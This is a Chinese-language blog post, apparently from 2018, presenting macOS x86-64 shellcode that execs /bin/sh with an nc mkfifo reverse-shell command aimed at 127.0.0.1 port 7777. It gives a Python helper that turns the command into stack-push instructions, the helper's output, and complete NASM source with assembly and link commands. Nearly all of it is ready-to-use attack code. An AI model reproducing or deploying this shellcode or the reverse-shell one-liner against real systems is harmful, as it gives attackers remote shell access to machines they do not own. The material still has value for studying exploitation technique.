【shellcode】macOS 利用nc反弹shell的shellcode

shellcode功能：获取execve系统的调用，执行execve("/bin//sh\x00","-c",CMD)，其中CMD是我们需要执行的命令，shellcode中我把CMD push到栈上。由于一开始汇编时遇到注释相关的问题，我就把注释删了，lldb或gdb调试再结合参考文章看一下就比较清楚了。

最新版本放在这里：

• https://gist.github.com/thinkycx/4cd3c90804b7e2366d49bf06d0cbb385
• https://gist.github.com/thinkycx/66b9b1d02a514a4b72daef6569ee6c71

生成push字符串的汇编如下：

#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode : push string into stack and esp points to it!
# usage:
#       change payload and run it.
import math
def pushstr(string='/home/orw/flag',length=8):
    '''
    return asm shellcode : push string into stack and esp points to it!
    '''
    print 'pushasm: '+string
    string = string[::-1]
    pushstr = ''
    times = int(math.ceil(float(len(string))/length))
    startpos = 0
    for i in range(1,times+1):
        ilen = (len(string) - (times-i)*length)
        ilen = ilen if ilen < length else length
        istring = string[startpos:startpos+ilen].encode('hex')
        pushstr += 'mov rcx, 0x%s\npush rcx\n' % istring
        #pushstr += 'push 0x%s;' % istring
        # print 'start '+str(startpos)+' end '+str(startpos+ilen)
        startpos += ilen
    print pushstr
    # log.info("/home/orw/flag\x00".encode('hex'))
    return pushstr

payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'
pushstr(payload)

'''
Output: 
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''

shellcode:

; date: 2018-12-11
; author: thinkycx
; description: 
;        reverse /bin/sh by nc, reference: https://modexp.wordpress.com/2017/01/21/shellcode-osx/
; usage: 
;        nasm -f macho64 macOS-reverse-shellcode.asm
;        ld -macosx_version_min 10.7.0 -o macOS-reverse-shellcode macOS-reverse-shellcode.o
BITS 64

global start

section .text

start:
    xor     rax, rax
    mov     rax,0x2
    ror     rax, 0x28
    or      rax, 59
    mov rcx, rax



    xor     rdx, rdx
    mov     rbx, 0x68732f2f6e69622f
    push    rdx
    push    rbx
    push    rsp
    pop     rdi

    push    rdx
    mov     rbx, 0x632d
    push    rdx
    push    rbx
    push    rsp
    pop     rbx

    push    rdx

    mov rcx, 0x662f706d74
    push rcx
    mov rcx, 0x2f203e2037373737
    push rcx
    mov rcx, 0x20312e302e302e37
    push rcx
    mov rcx, 0x323120636e7c3126
    push rcx
    mov rcx, 0x3e3220692d206873
    push rcx
    mov rcx, 0x2f6e69622f7c662f
    push rcx
    mov rcx, 0x706d742f20746163
    push rcx
    mov rcx, 0x3b662f706d742f20
    push rcx
    mov rcx, 0x6f6669666b6d3b66
    push rcx
    mov rcx, 0x2f706d742f206d72
    push rcx

    push rsp
    pop rcx

    push    rdx
    push    rcx
    push    rbx
    push    rdi
    push    rsp
    pop     rsi

    syscall

参考： https://modexp.wordpress.com/2017/01/21/shellcode-osx/